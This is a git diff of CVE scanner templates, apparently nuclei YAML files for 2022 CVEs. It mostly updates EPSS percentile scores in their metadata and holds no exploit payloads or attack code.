cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-32007.yaml b/http/cves/2022/CVE-2022-32007.yaml index ac45d0d88f..1fffccff83 100644 --- a/http/cves/2022/CVE-2022-32007.yaml +++ b/http/cves/2022/CVE-2022-32007.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-32007 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76486 + epss-percentile: 0.76508 cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32015.yaml b/http/cves/2022/CVE-2022-32015.yaml index a110ecad96..9498246c9f 100644 --- a/http/cves/2022/CVE-2022-32015.yaml +++ b/http/cves/2022/CVE-2022-32015.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-32015 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76486 + epss-percentile: 0.76508 cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32018.yaml b/http/cves/2022/CVE-2022-32018.yaml index 5f25e85a7e..c282a85203 100644 --- a/http/cves/2022/CVE-2022-32018.yaml +++ b/http/cves/2022/CVE-2022-32018.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-32018 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76486 + epss-percentile: 0.76508 cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32022.yaml b/http/cves/2022/CVE-2022-32022.yaml index 396e2b4306..637687204e 100644 --- a/http/cves/2022/CVE-2022-32022.yaml +++ b/http/cves/2022/CVE-2022-32022.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-32022 cwe-id: CWE-89 epss-score: 0.00773 - epss-percentile: 0.79309 + epss-percentile: 0.79318 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32024.yaml b/http/cves/2022/CVE-2022-32024.yaml index 3821eb35f9..cdf5274bda 100644 --- a/http/cves/2022/CVE-2022-32024.yaml +++ b/http/cves/2022/CVE-2022-32024.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-32024 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76486 + epss-percentile: 0.76508 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32025.yaml b/http/cves/2022/CVE-2022-32025.yaml index 947b70804b..c797f4b39b 100644 --- a/http/cves/2022/CVE-2022-32025.yaml +++ b/http/cves/2022/CVE-2022-32025.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-32025 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76486 + epss-percentile: 0.76508 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32026.yaml b/http/cves/2022/CVE-2022-32026.yaml index 4dcd346830..55ed9bf257 100644 --- a/http/cves/2022/CVE-2022-32026.yaml +++ b/http/cves/2022/CVE-2022-32026.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-32026 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76486 + epss-percentile: 0.76508 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32028.yaml b/http/cves/2022/CVE-2022-32028.yaml index 869322a57a..2781c3c5d4 100644 --- a/http/cves/2022/CVE-2022-32028.yaml +++ b/http/cves/2022/CVE-2022-32028.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-32028 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76486 + epss-percentile: 0.76508 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32094.yaml b/http/cves/2022/CVE-2022-32094.yaml index 75863d4abb..22b3a6ed46 100644 --- a/http/cves/2022/CVE-2022-32094.yaml +++ b/http/cves/2022/CVE-2022-32094.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-32094 cwe-id: CWE-89 epss-score: 0.01144 - epss-percentile: 0.83186 + epss-percentile: 0.83196 cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32195.yaml b/http/cves/2022/CVE-2022-32195.yaml index f28b451233..c963c0b59a 100644 --- a/http/cves/2022/CVE-2022-32195.yaml +++ b/http/cves/2022/CVE-2022-32195.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-32195 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40927 + epss-percentile: 0.40951 cpe: cpe:2.3:a:edx:open_edx:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32409.yaml b/http/cves/2022/CVE-2022-32409.yaml index 828e98740d..d587dc6fdd 100644 --- a/http/cves/2022/CVE-2022-32409.yaml +++ b/http/cves/2022/CVE-2022-32409.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-32409 cwe-id: CWE-22 epss-score: 0.6578 - epss-percentile: 0.97547 + epss-percentile: 0.97548 cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3242.yaml b/http/cves/2022/CVE-2022-3242.yaml index ef8c5ee4ce..eabdf8abae 100644 --- a/http/cves/2022/CVE-2022-3242.yaml +++ b/http/cves/2022/CVE-2022-3242.yaml @@ -15,9 +15,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-3242 - cwe-id: CWE-79,CWE-94 + cwe-id: CWE-94,CWE-79 epss-score: 0.02392 - epss-percentile: 0.88696 + epss-percentile: 0.88701 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true @@ -39,4 +39,5 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "") && contains(tolower(body), "microweber")' condition: and -# digest: 4b0a00483046022100fa6b64e93334900832b47ee485f7e9ace21451bc0dcdeee4540f3ce7e2c32635022100be242f505494d9f58ea7c4937deb1cd1ff2fa201e6547f4793ba9c970708b99d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100fa6b64e93334900832b47ee485f7e9ace21451bc0dcdeee4540f3ce7e2c32635022100be242f505494d9f58ea7c4937deb1cd1ff2fa201e6547f4793ba9c970708b99d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2022/CVE-2022-32429.yaml b/http/cves/2022/CVE-2022-32429.yaml index 772330addd..298c46efcc 100644 --- a/http/cves/2022/CVE-2022-32429.yaml +++ b/http/cves/2022/CVE-2022-32429.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-32429 cwe-id: CWE-287 epss-score: 0.0395 - epss-percentile: 0.91002 + epss-percentile: 0.91007 cpe: cpe:2.3:o:megatech:msnswitch_firmware:mnt.2408:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32444.yaml b/http/cves/2022/CVE-2022-32444.yaml index 91c4eaee35..66e81d6aee 100644 --- a/http/cves/2022/CVE-2022-32444.yaml +++ b/http/cves/2022/CVE-2022-32444.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-32444 cwe-id: CWE-601 epss-score: 0.00252 - epss-percentile: 0.62903 + epss-percentile: 0.62931 cpe: cpe:2.3:a:yuba:u5cms:8.3.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-32770.yaml b/http/cves/2022/CVE-2022-32770.yaml index e7db25e0b9..479b2beae6 100644 --- a/http/cves/2022/CVE-2022-32770.yaml +++ b/http/cves/2022/CVE-2022-32770.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-32770 cwe-id: CWE-79 epss-score: 0.00103 - epss-percentile: 0.41736 + epss-percentile: 0.41758 cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-33119.yaml b/http/cves/2022/CVE-2022-33119.yaml index dfc6bcaafd..4d42932d7c 100644 --- a/http/cves/2022/CVE-2022-33119.yaml +++ b/http/cves/2022/CVE-2022-33119.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-33119 cwe-id: CWE-79 epss-score: 0.00918 - epss-percentile: 0.81144 + epss-percentile: 0.81155 cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-33174.yaml b/http/cves/2022/CVE-2022-33174.yaml index 2b2ea9eea4..8c4a1961f9 100644 --- a/http/cves/2022/CVE-2022-33174.yaml +++ b/http/cves/2022/CVE-2022-33174.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-33174 cwe-id: CWE-863 epss-score: 0.00522 - epss-percentile: 0.74262 + epss-percentile: 0.7429 cpe: cpe:2.3:o:powertekpdus:basic_pdu_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-33901.yaml b/http/cves/2022/CVE-2022-33901.yaml index 770f53c613..f83a498494 100644 --- a/http/cves/2022/CVE-2022-33901.yaml +++ b/http/cves/2022/CVE-2022-33901.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2022-33901 epss-score: 0.00812 - epss-percentile: 0.79884 + epss-percentile: 0.79895 cpe: cpe:2.3:a:multisafepay:multisafepay_plugin_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-33965.yaml b/http/cves/2022/CVE-2022-33965.yaml index 8f1251053f..f16946fc32 100644 --- a/http/cves/2022/CVE-2022-33965.yaml +++ b/http/cves/2022/CVE-2022-33965.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-33965 cwe-id: CWE-89 epss-score: 0.01102 - epss-percentile: 0.82855 + epss-percentile: 0.82866 cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34045.yaml b/http/cves/2022/CVE-2022-34045.yaml index 5b1325b493..b02e0f136c 100644 --- a/http/cves/2022/CVE-2022-34045.yaml +++ b/http/cves/2022/CVE-2022-34045.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-34045 cwe-id: CWE-798 epss-score: 0.03001 - epss-percentile: 0.89801 + epss-percentile: 0.89806 cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34046.yaml b/http/cves/2022/CVE-2022-34046.yaml index 4e7c516c44..7e7fbc8c6f 100644 --- a/http/cves/2022/CVE-2022-34046.yaml +++ b/http/cves/2022/CVE-2022-34046.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-34046 cwe-id: CWE-863 epss-score: 0.21264 - epss-percentile: 0.95879 + epss-percentile: 0.95882 cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34047.yaml b/http/cves/2022/CVE-2022-34047.yaml index f23fc58072..1fbae7a53b 100644 --- a/http/cves/2022/CVE-2022-34047.yaml +++ b/http/cves/2022/CVE-2022-34047.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-34047 cwe-id: CWE-668 epss-score: 0.22865 - epss-percentile: 0.95981 + epss-percentile: 0.95984 cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34048.yaml b/http/cves/2022/CVE-2022-34048.yaml index 8a0dfcfad5..53017c3d43 100644 --- a/http/cves/2022/CVE-2022-34048.yaml +++ b/http/cves/2022/CVE-2022-34048.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-34048 cwe-id: CWE-79 epss-score: 0.0009 - epss-percentile: 0.38123 + epss-percentile: 0.38137 cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34049.yaml b/http/cves/2022/CVE-2022-34049.yaml index b64cd3815e..bbeb61c9e3 100644 --- a/http/cves/2022/CVE-2022-34049.yaml +++ b/http/cves/2022/CVE-2022-34049.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-34049 cwe-id: CWE-552 epss-score: 0.17531 - epss-percentile: 0.95542 + epss-percentile: 0.95544 cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34093.yaml b/http/cves/2022/CVE-2022-34093.yaml index c95c814e2c..98561c7b1f 100644 --- a/http/cves/2022/CVE-2022-34093.yaml +++ b/http/cves/2022/CVE-2022-34093.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-34093 cwe-id: CWE-79 epss-score: 0.00275 - epss-percentile: 0.64602 + epss-percentile: 0.64637 cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34094.yaml b/http/cves/2022/CVE-2022-34094.yaml index 6521e3769b..9ee35e6487 100644 --- a/http/cves/2022/CVE-2022-34094.yaml +++ b/http/cves/2022/CVE-2022-34094.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-34094 cwe-id: CWE-79 epss-score: 0.00275 - epss-percentile: 0.64602 + epss-percentile: 0.64637 cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34121.yaml b/http/cves/2022/CVE-2022-34121.yaml index 82e5f7f301..670eb30f78 100644 --- a/http/cves/2022/CVE-2022-34121.yaml +++ b/http/cves/2022/CVE-2022-34121.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-34121 cwe-id: CWE-829 epss-score: 0.71775 - epss-percentile: 0.97715 + epss-percentile: 0.97716 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34328.yaml b/http/cves/2022/CVE-2022-34328.yaml index 63930d00d6..0073dfa08e 100644 --- a/http/cves/2022/CVE-2022-34328.yaml +++ b/http/cves/2022/CVE-2022-34328.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-34328 cwe-id: CWE-79 epss-score: 0.00099 - epss-percentile: 0.40811 + epss-percentile: 0.40834 cpe: cpe:2.3:a:pmb_project:pmb:7.3.10:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34576.yaml b/http/cves/2022/CVE-2022-34576.yaml index a166e9094b..fb5f898f18 100644 --- a/http/cves/2022/CVE-2022-34576.yaml +++ b/http/cves/2022/CVE-2022-34576.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2022-34576 epss-score: 0.01478 - epss-percentile: 0.85343 + epss-percentile: 0.8535 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34590.yaml b/http/cves/2022/CVE-2022-34590.yaml index 6d1d273d1d..d04b13c3fe 100644 --- a/http/cves/2022/CVE-2022-34590.yaml +++ b/http/cves/2022/CVE-2022-34590.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-34590 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76486 + epss-percentile: 0.76508 cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3484.yaml b/http/cves/2022/CVE-2022-3484.yaml index 611e6b65e9..34d936913d 100644 --- a/http/cves/2022/CVE-2022-3484.yaml +++ b/http/cves/2022/CVE-2022-3484.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-3484 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.32949 + epss-percentile: 0.32958 cpe: cpe:2.3:a:wpb_show_core_project:wpb_show_core:-:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3506.yaml b/http/cves/2022/CVE-2022-3506.yaml index 1d65e31c00..8c8b19d194 100644 --- a/http/cves/2022/CVE-2022-3506.yaml +++ b/http/cves/2022/CVE-2022-3506.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-3506 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48495 + epss-percentile: 0.48508 cpe: cpe:2.3:a:never5:related_posts:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35151.yaml b/http/cves/2022/CVE-2022-35151.yaml index 768e07b365..87cd76fd41 100644 --- a/http/cves/2022/CVE-2022-35151.yaml +++ b/http/cves/2022/CVE-2022-35151.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-35151 cwe-id: CWE-79 epss-score: 0.02006 - epss-percentile: 0.87625 + epss-percentile: 0.87631 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35405.yaml b/http/cves/2022/CVE-2022-35405.yaml index 28ce949e14..2999128b31 100644 --- a/http/cves/2022/CVE-2022-35405.yaml +++ b/http/cves/2022/CVE-2022-35405.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-35405 cwe-id: CWE-502 epss-score: 0.97408 - epss-percentile: 0.99904 + epss-percentile: 0.99905 cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-35413.yaml b/http/cves/2022/CVE-2022-35413.yaml index 0cf6d08fad..c3063bb37f 100644 --- a/http/cves/2022/CVE-2022-35413.yaml +++ b/http/cves/2022/CVE-2022-35413.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-35413 cwe-id: CWE-798 epss-score: 0.68701 - epss-percentile: 0.97624 + epss-percentile: 0.97626 cpe: cpe:2.3:a:pentasecurity:wapples:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35416.yaml b/http/cves/2022/CVE-2022-35416.yaml index a22fe4dcf7..53aa877ef3 100644 --- a/http/cves/2022/CVE-2022-35416.yaml +++ b/http/cves/2022/CVE-2022-35416.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-35416 cwe-id: CWE-79 epss-score: 0.00099 - epss-percentile: 0.40737 + epss-percentile: 0.40759 cpe: cpe:2.3:a:h3c:ssl_vpn:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35493.yaml b/http/cves/2022/CVE-2022-35493.yaml index 4f50d24e6a..d162761774 100644 --- a/http/cves/2022/CVE-2022-35493.yaml +++ b/http/cves/2022/CVE-2022-35493.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-35493 cwe-id: CWE-79 epss-score: 0.00133 - epss-percentile: 0.48143 + epss-percentile: 0.48155 cpe: cpe:2.3:a:wrteam:eshop_-_ecommerce_\/_store_website:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3578.yaml b/http/cves/2022/CVE-2022-3578.yaml index d2024f1a52..a008e46681 100644 --- a/http/cves/2022/CVE-2022-3578.yaml +++ b/http/cves/2022/CVE-2022-3578.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-3578 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.32949 + epss-percentile: 0.32958 cpe: cpe:2.3:a:metagauss:profilegrid:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-36537.yaml b/http/cves/2022/CVE-2022-36537.yaml index 4b193cad24..78187258b4 100644 --- a/http/cves/2022/CVE-2022-36537.yaml +++ b/http/cves/2022/CVE-2022-36537.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-36537 cwe-id: CWE-200 epss-score: 0.93041 - epss-percentile: 0.98764 + epss-percentile: 0.98765 cpe: cpe:2.3:a:zkoss:zk_framework:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-36553.yaml b/http/cves/2022/CVE-2022-36553.yaml index e57b18231f..d99413255a 100644 --- a/http/cves/2022/CVE-2022-36553.yaml +++ b/http/cves/2022/CVE-2022-36553.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-36553 cwe-id: CWE-77 epss-score: 0.15943 - epss-percentile: 0.95352 + epss-percentile: 0.95351 cpe: cpe:2.3:o:hytec:hwl-2511-ss_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-36642.yaml b/http/cves/2022/CVE-2022-36642.yaml index aec825b554..60508bbee4 100644 --- a/http/cves/2022/CVE-2022-36642.yaml +++ b/http/cves/2022/CVE-2022-36642.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-36642 cwe-id: CWE-862 epss-score: 0.69681 - epss-percentile: 0.97648 + epss-percentile: 0.97649 cpe: cpe:2.3:o:telosalliance:omnia_mpx_node_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-36804.yaml b/http/cves/2022/CVE-2022-36804.yaml index 136319640b..b164245e5d 100644 --- a/http/cves/2022/CVE-2022-36804.yaml +++ b/http/cves/2022/CVE-2022-36804.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-36804 cwe-id: CWE-77 epss-score: 0.97134 - epss-percentile: 0.99718 + epss-percentile: 0.99719 cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-36883.yaml b/http/cves/2022/CVE-2022-36883.yaml index 003479c889..dfed6db7d0 100644 --- a/http/cves/2022/CVE-2022-36883.yaml +++ b/http/cves/2022/CVE-2022-36883.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-36883 cwe-id: CWE-862 epss-score: 0.00711 - epss-percentile: 0.78312 + epss-percentile: 0.78325 cpe: cpe:2.3:a:jenkins:git:*:*:*:*:*:jenkins:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-37042.yaml b/http/cves/2022/CVE-2022-37042.yaml index 40ecfaf3a1..d38255fcd1 100644 --- a/http/cves/2022/CVE-2022-37042.yaml +++ b/http/cves/2022/CVE-2022-37042.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-37042 cwe-id: CWE-22 epss-score: 0.97459 - epss-percentile: 0.99948 + epss-percentile: 0.99947 cpe: cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2022/CVE-2022-37153.yaml b/http/cves/2022/CVE-2022-37153.yaml index 7d33fe0ebf..0411877235 100644 --- a/http/cves/2022/CVE-2022-37153.yaml +++ b/http/cves/2022/CVE-2022-37153.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-37153 cwe-id: CWE-79 epss-score: 0.00099 - epss-percentile: 0.40737 + epss-percentile: 0.40759 cpe: cpe:2.3:a:articatech:artica_proxy:4.30.000000:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-37190.yaml b/http/cves/2022/CVE-2022-37190.yaml index ed6db04217..5d1e91c9f3 100644 --- a/http/cves/2022/CVE-2022-37190.yaml +++ b/http/cves/2022/CVE-2022-37190.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-37190 cwe-id: CWE-732 epss-score: 0.02018 - epss-percentile: 0.87655 + epss-percentile: 0.87661 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-37191.yaml b/http/cves/2022/CVE-2022-37191.yaml index 7c6cf70c26..a9fee8ae83 100644 --- a/http/cves/2022/CVE-2022-37191.yaml +++ b/http/cves/2022/CVE-2022-37191.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-37191 cwe-id: CWE-829 epss-score: 0.36609 - epss-percentile: 0.96718 + epss-percentile: 0.96719 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-37299.yaml b/http/cves/2022/CVE-2022-37299.yaml index 0a8bcc75c5..9178e8ad43 100644 --- a/http/cves/2022/CVE-2022-37299.yaml +++ b/http/cves/2022/CVE-2022-37299.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-37299 cwe-id: CWE-22 epss-score: 0.00376 - epss-percentile: 0.69775 + epss-percentile: 0.69801 cpe: cpe:2.3:a:shirne_cms_project:shirne_cms:1.2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3768.yaml b/http/cves/2022/CVE-2022-3768.yaml index c33e427ad9..013a5cc74b 100644 --- a/http/cves/2022/CVE-2022-3768.yaml +++ b/http/cves/2022/CVE-2022-3768.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-3768 cwe-id: CWE-89 epss-score: 0.01593 - epss-percentile: 0.85953 + epss-percentile: 0.85957 cpe: cpe:2.3:a:wpsmartcontracts:wpsmartcontracts:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3800.yaml b/http/cves/2022/CVE-2022-3800.yaml index 681437d447..01913d9db6 100644 --- a/http/cves/2022/CVE-2022-3800.yaml +++ b/http/cves/2022/CVE-2022-3800.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-3800 cwe-id: CWE-89,CWE-707 epss-score: 0.04344 - epss-percentile: 0.91368 + epss-percentile: 0.91372 cpe: cpe:2.3:a:ibax:go-ibax:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-38295.yaml b/http/cves/2022/CVE-2022-38295.yaml index 32ce61f5a3..e672a7f80b 100644 --- a/http/cves/2022/CVE-2022-38295.yaml +++ b/http/cves/2022/CVE-2022-38295.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-38295 cwe-id: CWE-79 epss-score: 0.00304 - epss-percentile: 0.66339 + epss-percentile: 0.66373 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38296.yaml b/http/cves/2022/CVE-2022-38296.yaml index 2089390017..acd02742b5 100644 --- a/http/cves/2022/CVE-2022-38296.yaml +++ b/http/cves/2022/CVE-2022-38296.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-38296 cwe-id: CWE-434 epss-score: 0.01488 - epss-percentile: 0.85394 + epss-percentile: 0.85401 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38463.yaml b/http/cves/2022/CVE-2022-38463.yaml index 735e93d473..3616717ae0 100644 --- a/http/cves/2022/CVE-2022-38463.yaml +++ b/http/cves/2022/CVE-2022-38463.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-38463 cwe-id: CWE-79 epss-score: 0.00141 - epss-percentile: 0.49663 + epss-percentile: 0.49681 cpe: cpe:2.3:a:servicenow:servicenow:san_diego:patch_4:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38467.yaml b/http/cves/2022/CVE-2022-38467.yaml index 9ebe5da7d5..9f0e32c6e3 100644 --- a/http/cves/2022/CVE-2022-38467.yaml +++ b/http/cves/2022/CVE-2022-38467.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-38467 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29488 + epss-percentile: 0.29493 cpe: cpe:2.3:a:crmperks:crm_perks_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38553.yaml b/http/cves/2022/CVE-2022-38553.yaml index d70445896b..242c9f6c71 100644 --- a/http/cves/2022/CVE-2022-38553.yaml +++ b/http/cves/2022/CVE-2022-38553.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-38553 cwe-id: CWE-79 epss-score: 0.00156 - epss-percentile: 0.51839 + epss-percentile: 0.51862 cpe: cpe:2.3:a:creativeitem:academy_learning_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38637.yaml b/http/cves/2022/CVE-2022-38637.yaml index 90de94a948..f62c16d926 100644 --- a/http/cves/2022/CVE-2022-38637.yaml +++ b/http/cves/2022/CVE-2022-38637.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-38637 cwe-id: CWE-89 epss-score: 0.01217 - epss-percentile: 0.83781 + epss-percentile: 0.83789 